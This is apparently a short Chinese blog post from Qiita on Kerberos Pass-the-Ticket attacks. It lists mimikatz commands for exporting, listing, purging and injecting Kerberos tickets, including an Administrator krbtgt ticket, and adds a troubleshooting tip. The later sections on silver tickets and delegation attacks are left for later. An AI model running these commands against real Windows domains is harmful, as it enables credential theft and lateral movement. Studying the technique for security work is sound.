Qiita Teams that are logged in
You are not logged in to any team

Log in to Qiita Team
Community
OrganizationAdvent CalendarQiitadon (β)
Service
Qiita JobsQiita ZineQiita Blog
Help us understand the problem. What is going on with this article?

TGS_REQ & TGS_REP所存在的安全问题

Pass The Ticket

两个步骤全是通过AS_REQ拿到的票据进行验证,那么完全可以只用这张票据来进行横向。

mimikatz使用

sekurlsa::tickets /export  // 导出本机票据
kerberos::list  // 查看本机票据
kerberos::purge  // 清除本机所有票据
kerberos::ptt c:\[0;86e204]-2-0-60a00000-Administrator@krbtgt-TEST.LOCAL.kirbi  // 导入票据

image.png

这里需要注意:我当前是win7普通本地管理员用户,mimikatz是用管理员权限起来的,那么在普通权限的cmd中klist是看不到mimikatz导入的票据的。踩了个大坑。

白银票据

放到后面和黄金票据一起说。

后文

因为没有搭建好委派的环境,而且理解的非常不透彻,所以下面的几部分都拖一拖。

  1. kerberosting
  2. 非约束委派
  3. 约束委派
  4. 基于资源的约束委派攻击
Y4er
Why not register and get more from Qiita?
  1. We will deliver articles that match you
    By following users and tags, you can catch up information on technical fields that you are interested in as a whole
  2. you can read useful information later efficiently
    By "stocking" the articles you like, you can search right away